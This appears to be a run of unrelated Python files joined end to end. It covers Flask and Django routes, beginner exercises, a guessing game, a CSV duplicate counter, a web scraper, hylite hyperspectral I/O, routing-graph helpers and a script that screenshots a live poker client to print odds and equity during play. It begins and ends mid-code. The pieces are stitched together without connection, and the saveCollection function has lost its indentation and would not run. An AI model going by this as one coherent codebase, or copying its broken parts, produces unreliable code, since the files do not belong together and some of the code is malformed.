    ('twelve', queries.get_query12),
    ('thirteen', queries.get_query13),
    ('fourteen', queries.get_query14),
    ('seventeen', queries.get_query17),
]:
    _register_graph(_page, _query)

if __name__ == '__main__':
    app.run()
|
import random

# Lifetime tallies shared by both games.
correct_guesses = 0
incorrect_guesses = 0


def _ask(prompt, valid, error_message):
    """Prompt repeatedly until the reply is one of `valid`; return the reply."""
    reply = ""
    while reply not in valid:
        print(prompt)
        reply = input()
        if reply not in valid:
            print(error_message)
    return reply


def _score_round(guess, answer):
    """Reveal `answer`, compare it with `guess`, and print updated totals."""
    global correct_guesses, incorrect_guesses
    print("Answer: " + answer)
    if guess == answer:
        correct_guesses += 1
        print("Your guess was correct!")  # bug fix: message said "corret"
    else:
        incorrect_guesses += 1
        print("Sorry, your guess was incorrect.")
    total_guesses = correct_guesses + incorrect_guesses
    print("Total Guesses: " + str(total_guesses))
    print("Total Correct Guesses: " + str(correct_guesses))


def _play_again():
    """Return True unless the player answers 'no' to the continue prompt."""
    reply = _ask("Do you want to continue? (yes or no)",
                 ("yes", "no"),
                 "Please type either 'yes' or 'no'")
    return reply != "no"


on_off = True
while on_off:
    print("Which guessing game do you want to play? (Coin Flip or Dice Roll)")
    game = input()
    if game == "Coin Flip":
        guess = _ask("Type your guess, Heads or Tails",
                     ("Heads", "Tails"),
                     "Please type either 'Heads' or 'Tails'")
        print("Your Guess: " + guess)
        answer = "Heads" if random.randint(1, 2) == 1 else "Tails"
        _score_round(guess, answer)
        on_off = _play_again()
    elif game == "Dice Roll":
        guess = _ask("Type your guess, 1-6",
                     ("1", "2", "3", "4", "5", "6"),
                     "Please type either 1, 2, 3, 4, 5 or 6")
        print("Your Guess: " + guess)
        answer = str(random.randint(1, 6))
        _score_round(guess, answer)
        on_off = _play_again()
    else:
        print("Please type either 'Coin Flip' or 'Dice Roll'")
def sum_with_for(numbers):
    """Return the sum of `numbers` by accumulating in a for loop.

    Bug fix: the accumulator was named `sum`, shadowing the builtin.
    """
    total = 0
    for value in numbers:
        total += value
    return total
def sum_with_while(numbers):
    """Return the sum of `numbers` using an index-driven while loop.

    Bug fix: the accumulator was named `sum`, shadowing the builtin.
    """
    total = 0
    index = 0
    while index < len(numbers):
        total += numbers[index]
        index += 1
    return total
def sum_with_recursion(numbers):
    """Return the sum of `numbers` recursively.

    Base case: an empty sequence sums to 0; otherwise the sum is the first
    element plus the (recursive) sum of the rest.
    """
    if not numbers:
        return 0
    return numbers[0] + sum_with_recursion(numbers[1:])
def combine_alternate(list_a, list_b):
    """Interleave two lists element by element and return the result.

    For example, given ['a', 'b', 'c'] and [1, 2, 3] this returns
    ['a', 1, 'b', 2, 'c', 3]. Bug fix: the original only printed the
    combined list (returning None) although the problem statement asks
    for a return value; the print is kept for backward compatibility.
    Extra elements of the longer list are ignored (previously a length
    mismatch raised IndexError).
    """
    combined = []
    for left, right in zip(list_a, list_b):
        combined.append(left)
        combined.append(right)
    print(combined)
    return combined
def first_x_fibonacci(x=10):
    """Print and return the first `x` Fibonacci numbers, starting 0, 1.

    Bug fix: the loop previously compared against a hard-coded 10, so the
    `x` parameter was ignored and any x < 2 looped forever.
    """
    a, b = 0, 1
    fibonacci_list = []
    while len(fibonacci_list) < x:
        fibonacci_list.append(a)
        a, b = b, a + b
    print(fibonacci_list)
    return fibonacci_list
def largest_number(input_list):
    """Print and return the largest number formed by concatenating the
    non-negative integers of `input_list`.

    Bug fix: a plain descending string sort is wrong for inputs like
    [3, 30, 34] (it yields 34303 instead of 34330). The correct ordering
    places a before b when the concatenation a+b beats b+a.
    """
    from functools import cmp_to_key

    digits = [str(x) for x in input_list]
    # negative => a first; compare the two possible concatenations
    digits.sort(key=cmp_to_key(lambda a, b: (a + b < b + a) - (a + b > b + a)))
    largest = int(''.join(digits))
    print(largest)
    return largest
def sum_of_100():
    """Print and return every way of inserting '+', '-' or nothing between
    the digits 1..9 (in this order) so the expression evaluates to 100.

    For example: 1 + 2 + 34 - 5 + 67 - 8 + 9 = 100.
    (This was previously an unimplemented stub.)
    """
    from itertools import product

    solutions = []
    for ops in product(('', '+', '-'), repeat=8):
        expression = '1'
        for op, digit in zip(ops, '23456789'):
            expression += op + digit
        # eval() is safe here: the expression is built solely from our own
        # digits and operators, never from external input.
        if eval(expression) == 100:
            print(expression + ' = 100')
            solutions.append(expression)
    return solutions
def main():
    """Exercise the practice problems; most calls are left commented out."""
    sample = [1, 2, 3, 4, 5, 6]
    # Problem 1
    # print(sum_with_for(sample))
    print(sum_with_while(sample))
    print(sum_with_recursion(sample))
    # Problem 2
    # combine_alternate(['a', 'b', 'c'], [1, 2, 3])
    # Problem 3
    # first_x_fibonacci()
    # Problem 4
    # largest_number([50, 2, 1, 9])


if __name__ == '__main__':
    main()
from app import app, db
from flask import render_template, redirect, url_for, flash, request
from app.forms import LoginForm, RegisterForm, PostForm
from flask_login import current_user, login_user, logout_user, login_required
from app.models import User, Post
from werkzeug.urls import url_parse
@app.route('/', methods=['GET','POST'])
@app.route('/index', methods=['GET','POST'])
def index():
    """Render the home page with a demo user and a computed number."""
    demo_user = {'username': 'Daniel'}
    four = 2 + 2
    return render_template('index.html', user=demo_user, num=four, title='Home Page')
@app.route('/posts', methods=['GET','POST'])
@login_required
def posts():
    """List the current user's posts and handle new-post submissions."""
    form = PostForm()
    if form.validate_on_submit():
        # NOTE(review): the post body is read from a field named `username` —
        # looks odd; confirm the PostForm field naming.
        new_post = Post(body=form.username.data, author=current_user)
        db.session.add(new_post)
        db.session.commit()
        flash('Congratulations, on the new post!')
        return redirect(url_for('posts'))
    user_posts = current_user.posts if current_user.is_authenticated else []
    return render_template('posts.html', title='Posts', posts=user_posts, form=form)
# @app.route('/redirect')
# def goaway():
# return redirect(url_for('index'))
@app.route('/login', methods=['GET','POST'])
def login():
    """Authenticate a user and redirect to `next` (same-site only) or the index.

    Bug fix: the success flash message said "loggin in" instead of "logging in".
    """
    if current_user.is_authenticated:
        return redirect(url_for('index'))
    login_form = LoginForm()
    if login_form.validate_on_submit():
        user = User.query.filter_by(username=login_form.username.data).first()
        if user is None or not user.check_password(login_form.password.data):
            flash('Invalid login credentials')
            return redirect(url_for('login'))
        login_user(user, remember=login_form.remember_me.data)
        next_page = request.args.get('next')
        # Only honour a relative `next` target, to avoid open-redirect abuse.
        if not next_page or url_parse(next_page).netloc != '':
            next_page = url_for('index')
        flash('Thanks for logging in {}!'.format(current_user.username))
        return redirect(next_page)
    return render_template('login.html', form=login_form)
@app.route('/register', methods=['GET','POST'])
def register():
    """Create a new account, then send the user to the login page."""
    if current_user.is_authenticated:
        return redirect(url_for('index'))
    register_form = RegisterForm()
    if not register_form.validate_on_submit():
        return render_template('register.html', form=register_form)
    new_user = User(username=register_form.username.data,
                    email=register_form.email.data)
    new_user.set_password(register_form.password.data)
    db.session.add(new_user)
    db.session.commit()
    flash('Congratulations, you are now registered!')
    return redirect(url_for('login'))
@app.route('/logout')
def logout():
    """Log the current user out and return to the index page."""
    logout_user()
    home = url_for('index')
    return redirect(home)
|
#!/usr/bin/env python
from __future__ import print_function
import subprocess, os, time, sys
# Plugin-style metadata — presumably consumed by a hosting menu/launcher
# (NOTE(review): confirm against the framework that imports this module).
short_name = 'Opt 2'
disp_name = 'Database Stats'
otype = 'Routine'
# Prompts for the two input file paths requested by run().
need = ['Where is the location of your Old Database file: ', \
        'Where is the location of your New Database file: ']
# Module-level state shared between run() and output_to_file().
answers = []
dups = {}
hits=0
def run():
    """Interactively compare two CSV database logs and summarise duplicates.

    Prompts for the old and new database file paths, tallies how often the
    values in columns 3 and 6 appear across both files (skipping each file's
    first two header lines), then writes a report via output_to_file().
    Python 2 module (uses raw_input); os.system('cls') is Windows-only.
    """
    global answers, dups, hits
    hits = 0
    answers = []
    dups = {}
    while True:
        os.system('cls')  # Windows-only screen clear
        # Bug fix: this list previously started as ['', ''] while the two
        # paths were *appended*, so answers[0]/answers[1] stayed empty and
        # the open() calls below could never succeed.
        answers = []
        i = 0
        while i < len(need):
            ans = raw_input(need[i])
            if validate(ans):
                answers.append(ans)
                i += 1
        # Strip the surrounding quote characters from the pasted paths.
        answers[0] = (answers[0])[1:-1]
        answers[1] = (answers[1])[1:-1]
        wait_timer('\nSearching your log files..')
        with open(answers[0], 'r') as log_file:
            with open(answers[1], 'r') as second_log:
                for _ in range(2): next(log_file)  # skip header lines
                for line in log_file:
                    line_split = line.split(',')
                    # count non-empty values from columns 3 and 6
                    if not line_split[3] in dups:
                        if (line_split[3] != ''):
                            dups.update({str(line_split[3]): 1})
                    else: dups[line_split[3]] += 1
                    if not line_split[6] in dups:
                        if line_split[6] != '':
                            dups.update({str(line_split[6]): 1})
                    else: dups[line_split[6]] += 1
                for _ in range(2): next(second_log)  # skip header lines
                for line in second_log:
                    if line.startswith('Time') or line.startswith('Combined'):
                        pass  # skip repeated header/summary rows
                    else:
                        line_split = line.split(',')
                        if not line_split[3] in dups:
                            if (line_split[3] != ''):
                                dups.update({str(line_split[3]): 1})
                        else: dups[line_split[3]] += 1
                        if not line_split[6] in dups:
                            if line_split[6] != '':
                                dups.update({str(line_split[6]): 1})
                        else: dups[line_split[6]] += 1
        output_to_file()
        raw_input('\n\nSearch finished with ' + str(hits) +
                  ' results found. Please press enter to return.')
        return
def output_to_file():
    """Write the duplicate summary plus the matching log lines to a
    timestamped text file under .\\Search_Results (path assumes Windows).

    Reads the two file paths from the module-level `answers` list and the
    tallies from `dups`; increments the global `hits` counter once per
    duplicated value written.
    """
    global hits
    now = time.strftime("%d%b%Y-%H%M")
    path = os.getcwd()
    save_file = path+"\\Search_Results\\Database_Sumary_on_"+str(now)+'.txt'
    sys.stdout.write('\nWriting search hits to file...')
    with open(answers[0], 'r') as first_file:
        with open(answers[1], 'r') as second_file:
            with open(save_file, 'w') as output:
                output.write('Summary of search hits...\n')
                # First pass: one summary line per value seen more than once.
                for z in sorted(dups, key=dups.__getitem__, reverse=True):
                    if dups[z] > 1: output.write(str(z)+': '+str(dups[z])+'\n')
                output.write('\n\nHere are the search results...\n')
                # Second pass: re-scan both files for the lines containing each
                # duplicated value, de-duplicating on the session column [1].
                for z in sorted(dups, key=dups.__getitem__, reverse=True):
                    found_lines=[]
                    sesh=''
                    if dups[z] > 1:
                        first_file.seek(0)
                        for _ in range(2): next(first_file)  # skip header lines
                        for line in first_file:
                            line1_split=line.split(',')
                            if str(z) in line:
                                if not sesh == line1_split[1]:
                                    sesh=line1_split[1]
                                    found_lines.append(line)
                        second_file.seek(0)
                        for _ in range(2): next(second_file)  # skip header lines
                        for line2 in second_file:
                            line2_split=line2.split(',')
                            if str(z) in line2:
                                if not sesh == line2_split[1]:
                                    sesh=line2_split[1]
                                    found_lines.append(line2)
                        output.write('\nFound '+str(z)+' with '+str(dups[z])+' hits.\n')
                        for k in found_lines:
                            output.write(k)
                        sys.stdout.write('.')  # progress dot per value
                        hits +=1
def validate(char):
    """Return True when the user's input is non-empty (truthy), else False."""
    return bool(char)
# this sections prints a wait timer
def wait_timer(what):
    """Print `what` followed by four dots, one every quarter second."""
    sys.stdout.write(what + '..')
    for _ in range(4):
        sys.stdout.write('.')
        sys.stdout.flush()
        time.sleep(.25)
|
import random

# Two samples of ten values drawn (with replacement) from 11..29.
L1 = random.choices(list(range(11, 30)), k = 10)
L2 = random.choices(list(range(11, 30)), k = 10)
print(L1)
print(L2)
# i: elements common to both samples
print(set(L1).intersection(set(L2)))
# ii: distinct elements of each sample
print(set(L1))
print(set(L2))
# iii-v: minimum, maximum and sum of each sample
for stat in (min, max, sum):
    print(stat(L1))
    print(stat(L2))
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat May 4 23:20:45 2019
@author: allen
"""
# get the target url
import urllib.request as urlrequest
from bs4 import BeautifulSoup

actual_data_url = 'http://py4e-data.dr-chuck.net/known_by_Fikret.html'
page = urlrequest.urlopen(actual_data_url)
soup = BeautifulSoup(page, 'html.parser')

# get info: tally how often each anchor text appears on the page
counts = dict()
tags = soup('a')
print(tags[6].get_text())  # text of the seventh <a> tag
for tag in tags:
    name = tag.get_text()
    counts[name] = counts.get(name, 0) + 1
print(counts)
import matplotlib.pyplot as plt
import mpl_toolkits.mplot3d.axes3d as Axes3D
class GUI():
    """Matplotlib-based 3D view for the quadcopter simulation."""

    def __init__(self):
        # Build the figure with a fixed 3D viewing volume.
        self.fig = plt.figure()
        self.ax = self.fig.add_subplot(111, projection='3d')
        self.ax.set_xlim3d([-2.0, 2.0])
        self.ax.set_xlabel('X')
        self.ax.set_ylim3d([-2.0, 2.0])
        self.ax.set_ylabel('Y')
        self.ax.set_zlim3d([0, 5.0])
        self.ax.set_zlabel('Z')
        self.ax.set_title('Quadcopter Simulation')
        # Bug fix: a dangling `self.` statement here was a SyntaxError.

    def init_plot(self):
        """Draw an (initially empty) blue trajectory line."""
        self.ax.plot([], [], [], color='blue', linewidth=3)
|
# import the necessary packages
import logging
import os
import shutil
from datetime import datetime
import cv2
import numpy as np
from PIL import Image
import time
from threading import Event
from card_classifier import CardClassifier
from card_util import get_game_area_as_2d_array, \
init_logger, clip_and_save, timeit, trim_main_window_image_array, \
rgb_yx_array_to_grayscale, find_contours, display_image_with_contours
from configuration import Config as cfg
from number_reader import NumberReader
import sys
from scipy.special import comb
# Module loggers: one for normal events, one for verbose tracing.
logger = logging.getLogger(__name__)
trace_logger = logging.getLogger(__name__ + "_trace")
def get_out_odds(len_common_cards, n_outs, n_chances):
    """Percentage chance of drawing one of `n_outs` cards in `n_chances` draws.

    The unseen deck excludes the visible common cards and our two hole cards.
    With two cards to come, draws hitting exactly one out are also counted.
    """
    unseen = 52.0 - len_common_cards - 2
    total_draws = comb(N=unseen, k=n_chances, exact=False, repetition=False)
    hitting_draws = comb(N=n_outs, k=n_chances, exact=False, repetition=False)
    if n_chances == 2:
        # add the draws where exactly one of the two cards is an out
        hitting_draws += n_outs * (unseen - n_outs)
    return 100.0 * (hitting_draws / total_draws)
def perc_to_odds_to_1(perc):
    """Convert a win percentage into "X to 1" odds (e.g. 20% -> 4.0)."""
    return (100 - perc) / perc
class GameInfo(object):
    """Snapshot of the table state extracted from one screenshot."""

    def __init__(self):
        self.common_cards = []       # board cards identified so far
        self.hole_cards = []         # our two cards
        self.pot_starting = None     # pot before this betting round
        self.to_call = None          # chips needed to call
        self.pot = None              # total pot including live bets
        self.chips_remaining = None  # our stack size

    def pot_odds(self):
        """Pot-to-call ratio; -2 is the sentinel for "nothing to call"."""
        if self.pot is None or self.to_call is None or self.to_call <= 0:
            return -2
        return self.pot / self.to_call

    def is_equal(self, other_gi):
        """True when every scalar field and both card lists match `other_gi`.

        (chips_remaining is deliberately not compared, matching the
        original behaviour.)
        """
        if other_gi is None:
            return False
        scalars_match = all(
            getattr(self, name) == getattr(other_gi, name)
            for name in ('pot_starting', 'to_call', 'pot')
        )
        if not scalars_match:
            return False
        return (np.array_equal(self.common_cards, other_gi.common_cards)
                and np.array_equal(self.hole_cards, other_gi.hole_cards))
@timeit
def get_hole_cards(game_area_image_array, card_classifier, game_info):
    """Classify the hero's two hole cards and store them on `game_info`.

    Crops the hole-card region (cfg.HERO_PLAYER_HOLE_CARDS_LOC) from the
    game-area RGB array, converts it to grayscale, and asks the classifier
    for the cards; the classifier is expected to return (at least) two
    entries, since both are logged below.
    """
    image_array = cfg.HERO_PLAYER_HOLE_CARDS_LOC.clip_2d_array(game_area_image_array)
    #display_image_with_contours(image_array, [])
    grey_array = rgb_yx_array_to_grayscale(image_array)
    game_info.hole_cards = card_classifier.evaluate_hole_card_image_array(grey_array)
    logger.info("Found hole card {} and {}".format(
        card_classifier.get_card_string(game_info.hole_cards[0]),
        card_classifier.get_card_string(game_info.hole_cards[1])
    ))
@timeit
def find_common_cards(screenshot_rgb_yx_array, card_classifier, gi):
    """Locate and classify the board (common) cards, appending them to `gi`.

    Works on a fixed crop of the table area ([125:190, 240:550] in y,x
    order), finds card-sized contours, and classifies each cropped
    candidate image. Cleanup: removed an unused local (`y`) and stale
    commented-out experiments from the original.
    """
    bw = rgb_yx_array_to_grayscale(screenshot_rgb_yx_array[125:190, 240:550])
    # NOTE: its img[y: y + h, x: x + w] and *not* img[x: x + w, y: y + h]
    if False:  # debugging aid: show the grayscale crop
        cv2.imshow('image', bw)
        cv2.waitKey(0)
        cv2.destroyAllWindows()
    cnts = find_contours(bw, min_width=cfg.CARD_WIDTH_PIXELS - 5,
                         max_width=cfg.CARD_WIDTH_PIXELS + 15,
                         min_height=cfg.CARD_HEIGHT_PIXELS - 15,
                         max_height=cfg.CARD_HEIGHT_PIXELS + 15,
                         display=False)
    contours_list = list(cnts)
    #display_image_with_contours(bw, [c.points_array for c in contours_list])
    image_array = bw
    # classify each card-sized contour individually
    for idx, contour in enumerate(contours_list):
        crop_img = contour.bounding_box.clip_2d_array(image_array)
        c = card_classifier.evaluate_card(crop_img)
        logger.info(f"Classified extracted image #{idx} as {card_classifier.get_card_string(c)}")
        if c is not None:
            gi.common_cards.append(c)
@timeit
def extract_game_info_from_screenshot(screenshot_image_rgb_yx_array, card_classifier, number_reader=None):
    """Build a GameInfo from a raw screenshot array.

    Trims the screenshot to the game window, optionally reads bets / stack /
    pot with `number_reader`, then classifies hole and common cards.
    """
    logger.info(f"Starting catpure of {screenshot_image_rgb_yx_array.shape}")
    gi = GameInfo()
    game_area_image_array = trim_main_window_image_array(screenshot_image_rgb_yx_array)
    if number_reader is not None:
        bets = number_reader.get_bets(game_area_image_array.copy())
        gi.to_call = 0
        gi.chips_remaining = number_reader.get_hero_chips_remaining(game_area_image_array.copy())
        if len(bets) > 0 and gi.chips_remaining is not None:
            # bets[0] appears to be the hero's own bet — TODO confirm.
            # The amount to call is capped by our effective stack.
            gi.to_call = min(np.max(bets[1:]), gi.chips_remaining + bets[0]) - bets[0]
        gi.pot_starting = number_reader.get_starting_pot(game_area_image_array.copy())
        if gi.chips_remaining is not None:
            # total pot = starting pot + each live bet, capped at our stack
            gi.pot = gi.pot_starting + np.sum([min(gi.chips_remaining + bets[0], b) for b in bets])
        logger.info(f"Starting Pot: {gi.pot_starting}\nTotal Pot: {gi.pot}\nTo Call: {gi.to_call}")
    get_hole_cards(game_area_image_array=game_area_image_array,
                   card_classifier=card_classifier,
                   game_info=gi)
    find_common_cards(screenshot_rgb_yx_array=game_area_image_array,
                      card_classifier=card_classifier, gi=gi)
    # display_cv2_image_with_contours(bw, cnts)
    return gi
# Set by the signal handlers below to request a clean shutdown.
event_exit = Event()
@timeit
def get_poker_image_rgb_yx_array():
    """Capture the current poker-client screenshot as an RGB (y, x) array."""
    import poker  # project-local module, imported lazily
    return poker.take_screenshot()
def main():
    """Capture loop: repeatedly screenshot the poker client, extract the game
    state, and print odds/equity whenever the state changes.

    Requires the project-local `poker` module for screenshots and equity
    simulations; loops for 60*60 iterations.
    """
    import poker
    init_logger()
    card_classifier = CardClassifier()
    number_reader = NumberReader()
    try:
        # start with clean screenshot / extracted-image directories
        os.makedirs(cfg.SCREENSHOTS_PATH, exist_ok=True)
        shutil.rmtree(cfg.EXTRACTED_IMAGES_PATH, ignore_errors=True)
        os.makedirs(cfg.EXTRACTED_IMAGES_PATH, exist_ok=True)
    except Exception as ex:
        print(ex)
    now = datetime.now()
    formatted_time = now.strftime("%Y_%m_%d__%H_%M_%S_%f")
    # file_path = os.path.join(cfg.UNIT_TEST_DATA_DIR, 'bet7.png')
    file_path = None
    # if file_path is None:
    iterations = 60 * 60
    last_gi = None
    for i in range(0, iterations):
        #file_path = os.path.join(cfg.SCREENSHOTS_PATH, 'screenshot_{}.png'.format(formatted_time))
        #capture_screenshot("chrome", output_file_path=file_path)
        chrome_image_rgb_array = get_poker_image_rgb_yx_array()
        gi = extract_game_info_from_screenshot(chrome_image_rgb_array, card_classifier, number_reader)
        if gi.is_equal(last_gi):
            continue  # nothing changed since the last capture; skip reprinting
        print("*" * 80)
        print(" " * 80)
        for c in gi.common_cards:
            print(f"Common card: {card_classifier.get_card_string(c)}")
        for h in gi.hole_cards:
            print(f"Hole card: {card_classifier.get_card_string(h)}")
        if gi.chips_remaining is not None:
            print("Chips remaining: {:,}".format(gi.chips_remaining))
            # NOTE(review): pot_starting may be None here, which would raise
            # in the {:,} format — confirm number_reader always returns a value.
            print("Starting Pot: {:,}".format(gi.pot_starting))
        if gi.pot is not None:
            print("Pot: {:,}".format(gi.pot))
            print("To Call: {:,}".format(gi.to_call))
        # presumably typical draw out-counts (e.g. flush 9, straight 8/4, pair 2)
        for outs in [9, 8, 4, 2]:
            perc = get_out_odds(len_common_cards=len(gi.common_cards), n_outs=outs, n_chances=1)
            ratio = perc_to_odds_to_1(perc)
            print(f"{outs} outs. {perc:.2f}% = {ratio:.2f}:1")
            if len(gi.common_cards) == 3:
                perc = get_out_odds(len_common_cards=len(gi.common_cards), n_outs=outs, n_chances=2)
                ratio = perc_to_odds_to_1(perc)
                print(f"{outs} outs. 2 cards to go {perc:.2f}% = {ratio:.2f}:1")
        print(f"\nPot odds: { 100.0/(1+gi.pot_odds()):.2f}% = {gi.pot_odds():.2f}:1 ")
        if len(gi.hole_cards) == 2 and gi.hole_cards[0] is not None:
            hole_card_string = "".join([card_classifier.get_card_short_string(hc) for hc in gi.hole_cards])
            common_cards_string = "".join([card_classifier.get_card_short_string(cc) for cc in gi.common_cards])
            equity3 = poker.run_simulation(3, hole_card_string, common_cards_string, 500000, False)
            equity4 = poker.run_simulation(4, hole_card_string, common_cards_string, 500000, False)
            equity5 = poker.run_simulation(5, hole_card_string, common_cards_string, 500000, False)
            print(f"Equity:\n3 players: {equity3:.2f}%\n4 players: {equity4:.2f}%\n5 players: {equity5:.2f}% ")
        last_gi = gi
def quit(signo, _frame):
    """Signal handler: report the signal number and flag the exit event.

    NOTE(review): shadows the builtin `quit`; harmless here, but renaming
    would be clearer.
    """
    print("Interrupted by %d, shutting down" % signo)
    event_exit.set()
if __name__ == '__main__':
    import signal
    # signal.signal(signal.CTRL_C_EVENT, quit)
    # signal.signal(signal.CTRL_BREAK_EVENT, quit)
    signal.signal(signal.SIGINT, quit)
    # SIGBREAK exists only on Windows; this line fails on POSIX systems.
    signal.signal(signal.SIGBREAK, quit)
    try:
        main()
    except KeyboardInterrupt:
        pass
|
"""
Import and export hyperspectral data. For hyperspectral images this is mostly done using GDAL,
while for point clouds and hyperspectral libraries a variety of different methods are included.
"""
from .headers import *
from .images import *
from .clouds import *
from .libraries import *
from .pmaps import *
from .cameras import saveCameraTXT, loadCameraTXT
from hylite import HyImage, HyCloud, HyLibrary, HyCollection, HyScene
from hylite.project import PMap, Camera, Pushbroom
import shutil
def save(path, data, **kwds):
    """
    A generic function for saving HyData instances such as HyImage, HyLibrary and HyCloud. The appropriate file format
    will be chosen automatically.

    *Arguments*:
     - path = the path to save the file too.
     - data = the data to save. This must be an instance of HyImage, HyLibrary or HyCloud.

    *Keywords*:
     - vmin = the data value that = 0 when saving RGB images.
     - vmax = the data value that = 255 when saving RGB images. Must be > vmin.
    """
    if isinstance(data, HyImage):
        # special case - save ternary image to png or jpg or bmp
        ext = os.path.splitext(path)[1].lower()
        if 'jpg' in ext or 'bmp' in ext or 'png' in ext or 'pdf' in ext:
            # Bug fix: the last test previously compared the *method* object
            # (data.band_count == 4), which is always False, so 4-band images
            # were never saved as RGBA.
            if data.band_count() in (1, 3, 4):
                from matplotlib.pyplot import imsave
                rgb = np.transpose(data.data, (1, 0, 2))
                if not (data.is_int() and np.max(rgb) <= 255):  # handle normalisation
                    # NOTE(review): in-place /= will fail on integer arrays;
                    # assumes float data here — confirm upstream dtypes.
                    rgb = rgb - kwds.get("vmin", 0)
                    rgb /= (kwds.get("vmax", np.max(rgb)) - kwds.get("vmin", 0))
                rgb = (np.clip(rgb, 0, 1) * 255).astype(np.uint8)  # convert to 8 bit image
                imsave(path, rgb)  # save the image
                return
        # save hyperspectral image (also the fallback for e.g. a 2-band image
        # given a png/jpg path, which previously crashed with an unbound
        # save_func)
        try:
            from osgeo import gdal  # is gdal installed?
            save_func = saveWithGDAL
        except ModuleNotFoundError:  # no gdal, use SPy
            save_func = saveWithSPy
        ext = 'dat'
    elif isinstance(data, HyHeader):
        save_func = saveHeader
        ext = 'hdr'
    elif isinstance(data, HyCloud):
        save_func = saveCloudPLY
        ext = 'ply'
    elif isinstance(data, HyLibrary):
        save_func = saveLibraryCSV
        ext = 'csv'
    elif isinstance(data, PMap):
        save_func = savePMap
        ext = 'npz'
    elif isinstance(data, Camera):
        save_func = saveCameraTXT
        ext = 'cam'
    elif isinstance(data, Pushbroom):
        save_func = saveCameraTXT
        ext = 'brm'
    elif isinstance(data, HyCollection):
        save_func = saveCollection
        ext = 'hyc'
        if isinstance(data, HyScene):  # special type of HyCollection, should have different extension
            ext = 'hys'
        if os.path.splitext(path)[0] + "." + ext != data._getDirectory():  # we're moving to a new home! Copy folder
            if os.path.exists(data._getDirectory()):  # if it exists...
                shutil.copytree(data._getDirectory(), os.path.splitext(path)[0] + "." + ext)
    elif isinstance(data, np.ndarray):
        save_func = np.save
        ext = 'npy'
    else:
        assert False, "Error - data type %s is unsupported by hylite.io.save." % type(data)

    # check path file extension
    if 'hdr' in os.path.splitext(path)[1]:  # auto strip .hdr extensions if provided
        path = os.path.splitext(path)[0]
    if ext not in os.path.splitext(path)[1]:  # add type-specific extension if needed
        path += '.%s' % ext

    # save!
    save_func(path, data)
def load(path):
    """
    A generic function for loading hyperspectral images, point clouds and libraries. The appropriate load function
    will be chosen based on the file extension.

    *Arguments*:
     - path = the path of the file to load.

    *Returns*:
     - a HyData instance containing the loaded dataset.
    """
    assert os.path.exists( path ), "Error: file %s does not exist." % path

    # load file formats with no associated header
    if 'npz' in os.path.splitext( path )[1].lower():
        return loadPMap(path)
    elif 'npy' in os.path.splitext( path )[1].lower():
        return np.load( path ) # load numpy

    # file (should/could) have header - look for it
    header, data = matchHeader( path )
    assert os.path.exists(data), "Error - file %s does not exist." % data
    ext = os.path.splitext(data)[1].lower()
    if ext == '':
        # extensionless (e.g. ENVI-style) data must at least be a file
        assert os.path.isfile(data), "Error - %s is a directory not a file." % data
    if 'ply' in ext: # point or hypercloud
        return loadCloudPLY(path)
    elif 'las' in ext: # point or hypercloud
        return loadCloudLAS(path)
    elif 'csv' in ext: # spectral library
        return loadLibraryCSV(path)
    elif 'sed' in ext: # spectral library
        return loadLibrarySED(path)
    elif 'tsg' in ext: # spectral library
        return loadLibraryTSG(path)
    elif 'hyc' in ext or 'hys' in ext: # load hylite collection or hyscene
        return loadCollection(path)
    elif 'cam' in ext or 'brm' in ext: # load pushbroom and normal cameras
        return loadCameraTXT(path)
    else: # image
        # load conventional images with PIL
        if 'png' in ext or 'jpg' in ext or 'bmp' in ext:
            # load image with matplotlib
            from matplotlib.pyplot import imread
            return HyImage(np.transpose(imread(path), (1, 0, 2)))
        try:
            from osgeo import gdal # is gdal installed?
            return loadWithGDAL(path)
        except ModuleNotFoundError: # no gdal, use SPy
            return loadWithSPy(path)
##############################################
## save and load data collections
##############################################
# save collection
def saveCollection(path, collection):
# generate file paths
dirmap = collection.get_file_dictionary(root=os.path.dirname(path),
name=os.path.splitext(os.path.basename(path))[0])
# save files
for p, o in dirmap.items():
os.makedirs(os.path.dirname(p), exist_ok=True)
save(p, o) # save each path and item [ n.b. this includes the header file! :-) ]
def loadCollection(path):
    """Load a HyCollection (.hyc) or HyScene (.hys) from disk."""
    # locate the header file and the on-disk directory
    header, directory = matchHeader(path)
    # derive the collection's name and parent directory
    root = os.path.dirname(directory)
    name = os.path.basename(os.path.splitext(directory)[0])
    ext = os.path.splitext(directory)[1]
    if 'hyc' in ext:
        return HyCollection(name, root, header=loadHeader(header))
    if 'hys' in ext:
        return HyScene(name, root, header=loadHeader(header))
    print(header, directory )
    assert False, "Error - %s is an invalid collection." % directory
from django.urls import path
from .views import get_a_routes_closest_stop_and_arrival_time, show_me_the_request
urlpatterns=[
    # /v1/<lat>/<lon>/<bus_route>: closest stop + arrival time for a route.
    path('v1/<lat>/<lon>/<bus_route>', get_a_routes_closest_stop_and_arrival_time, name='bus_data'),
    # /v1/<lat>/<lon>: NOTE(review): .as_view() implies a class-based view
    # while the first route uses a plain function — confirm
    # show_me_the_request really is class-based.
    path('v1/<lat>/<lon>', show_me_the_request.as_view(), name='print')
]
|
import numpy as np
import networkx as nx
from itertools import product
# Global variables
# Node-type labels (depot / supply / delivery) and the plot colours used below.
DEPOT, SUPPLY, DELIVERY = "Depot", "S", "D"
BLUE, GREEN, RED, BLACK = "blue", "green", "red", "black"
def get_label(instance, i: int):
    """
    Returns the label of a specified index of a model
    :param instance: instance object
    :param i: node index (0 = depot, 1..num_scooters = supply, rest = delivery)
    :return: one of DEPOT, SUPPLY or DELIVERY
    """
    if i == 0:
        return DEPOT
    if 0 < i <= instance.model_input.num_scooters:
        return SUPPLY
    return DELIVERY
def create_node_dict(instance):
    """Map each node's (lat, lon) coordinate to a dict holding its label."""
    locations = (
        [instance.depot]
        + list(zip(instance.scooters["lat"], instance.scooters["lon"]))
        + list(zip(instance.delivery_nodes["lat"], instance.delivery_nodes["lon"]))
    )
    return {
        coordinate: {"label": get_label(instance, i)}
        for i, coordinate in enumerate(locations)
    }
def make_graph(nodes: dict, bound):
    """
    Creates a networkx graph of the input nodes. Adds label to the nodes
    :param nodes: dictionary of nodes [lat, lon]: "label"
    :param bound: (lat_min, lat_max, lon_min, lon_max) used to normalise positions
    :return: networkx graph, list of node labels, list of nodes border color, list of nodes color
    """
    # Converts geographical coordinates to cartesian with lim [0,1] for visualization reasons
    nodes = convert_geographic_to_cart(nodes, bound)
    # make graph object
    graph = nx.DiGraph()
    graph.add_nodes_from([i for i in range(len(nodes.keys()))])
    # set node label and position in graph
    labels = {}
